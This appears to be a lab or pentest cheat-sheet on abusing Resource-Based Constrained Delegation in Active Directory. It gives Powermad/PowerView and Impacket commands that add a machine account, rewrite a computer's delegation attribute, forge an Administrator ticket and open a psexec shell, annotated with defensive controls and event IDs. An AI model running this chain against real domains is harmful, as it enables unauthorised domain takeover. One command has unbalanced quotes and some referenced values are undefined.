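Resource-Based Constrained Delegation (RBCD)
With RBCD, the resource's own computer object lists which accounts may act on behalf of other users towards it, in its msDS-AllowedToActOnBehalfOfOtherIdentity attribute. The commands below show the result when an ordinary domain account is able to write that attribute on a computer object.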
Windows
# PowerShell variant. Powermad supplies New-MachineAccount; PowerView supplies
# Get-DomainComputer and Set-DomainObject.
Import-Module .\Powermad.ps1
Import-Module .\PowerView.ps1
# Creates a machine account named "attackersystem" with a known password.
# Any authenticated user can do this while ms-DS-MachineAccountQuota is above 0
# (the AD default is 10); setting it to 0 removes this step for ordinary users.
# The creation is recorded on the DC as Security event 4741.
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
# Reads the objectSid of the account created above.
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
# Builds a security descriptor from SDDL: owner Builtin Administrators (O:BA)
# and a DACL holding a single allow ACE for that SID.
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
# Serialises the descriptor to a byte array, the form the attribute stores.
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# Writes the bytes to msDS-AllowedToActOnBehalfOfOtherIdentity on the computer
# object returned for $resourcedc ($resourcedc is not defined on this page).
# This only succeeds if the calling account has write access to that object, so
# the ACLs on computer objects are the control to review. With "Audit Directory
# Service Changes" enabled and a SACL on the object, the write is logged as
# event 5136 naming this attribute.
Get-DomainComputer $resourcedc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Linux
# Linux variant of the same sequence, using Impacket tools and an rbcd.py
# script that is not shown on this page. $ip is not set anywhere on the page.
#
# Adds a machine account, authenticating as l.livingstone with an NT hash
# instead of a password. Depends on ms-DS-MachineAccountQuota being above 0;
# logged on the DC as event 4741.
# NOTE(review): the single quotes on this line are unbalanced as written.
impacket-addcomputer resourced.local/l.livingstone -dc-ip $ip -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'attackersystem -computer-pass 'Summer2018!'
# Presumably sets msDS-AllowedToActOnBehalfOfOtherIdentity on RESOURCEDC, like
# the Set-DomainObject call in the Windows variant; confirm against the script.
# Needs write access to the target computer object; event 5136 if DS change
# auditing covers the object.
sudo python3 ../rbcd.py -dc-ip $ip -t RESOURCEDC -f 'ATTACK' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced\\l.livingstone
# Requests a cifs service ticket for resourcedc in the name of Administrator
# using the machine account's credentials (S4U2Self followed by S4U2Proxy).
# Marking privileged accounts "Account is sensitive and cannot be delegated" or
# adding them to Protected Users makes this request fail. The ticket requests
# appear on the DC as event 4769.
impacket-getST -spn cifs/resourcedc.resourced.local resourced/attackersystem\$:'Summer2018!' -impersonate Administrator -dc-ip $ip
# Points Kerberos-aware tools at a credential cache file; expected to be the
# file written by the previous step.
export KRB5CCNAME=Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache
# Authenticates with the cached ticket (-k -no-pass) and opens a remote shell.
# Impacket's psexec installs a service on the target, which shows up as event
# 7045 in the target's System log.
sudo impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip $ip